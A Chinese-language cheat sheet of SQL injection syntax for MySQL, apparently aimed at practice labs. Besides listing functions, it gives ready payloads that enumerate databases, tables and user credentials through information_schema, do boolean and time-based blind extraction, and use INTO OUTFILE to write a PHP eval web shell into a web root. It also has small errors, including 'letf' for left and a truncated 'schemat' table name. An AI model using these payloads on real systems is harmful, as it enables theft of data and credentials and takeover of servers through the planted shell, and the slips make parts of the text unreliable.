Sql注入漏洞常用语法

SQL注入常用语法

letf(a,b)函数，left(database(),1)='s' # 从左侧截取a的前b位，正确返回1，错误返回0

regexp函数，select user() regexp 'r' # regexp匹配user()的正则表达式

like函数，select user() like 'ro%' # like模糊匹配

substr(a,b,c),select substr() #从b开始截取a，c个字符串长度

ascii() # 将某个字符转为ascii值

chr('数字')，ord('字母') # 判断字母的ascii值是多少

show variables like "%secure%"; # 查看secure_file_priv当前的值

load_file() # 读取本地文件 

into outfile # 写文件

if(condition,A,B) #如果条件condition为True,则执行A，否则执行B

length() # 判断字符长度

group_concat() #结果集

concat_ws(0x7e,a,b) #一次性指定分隔符 

concat() #将多个字符串拼成一个字符串

select schema_name from information_schema.schemata; #查库

select table_name from information_schema.tables where table_schema='security'; # 查表

select column_name from information_schema.columns where table_name='users'; # 查列

select username,password from security.users; # 查字段

and left((select database()),1)='s' --+

and ascii(substr((select database()),1,1))=115; --+

and ascii(substr((select schema_name from information_schema.schemat limit 1,1),1,1))>10 --+

 union select 1,2,'<?php @eval($_POST[\'crow\']); ?>' into outfile '/var/www/html/tmp/1.php' --+ #写入一句话木马
 
 select if()
 - select database()
 - substr((select database()),1,1)
 - ascii(substr((select database()),1,1))
 - select if(ascii(substr((select database()),1,1)) > 10,2,3) # 布尔盲注
 
 select length(database()); # 判断数据库长度
 
 and if(length(database())=8,1,sleep(5)) --+  # 时间盲注
 
 and if(ascii(substr((select database()),1,1)) > 10,2,sleep(5)) --+ #判断数据库第一个字符的ascii值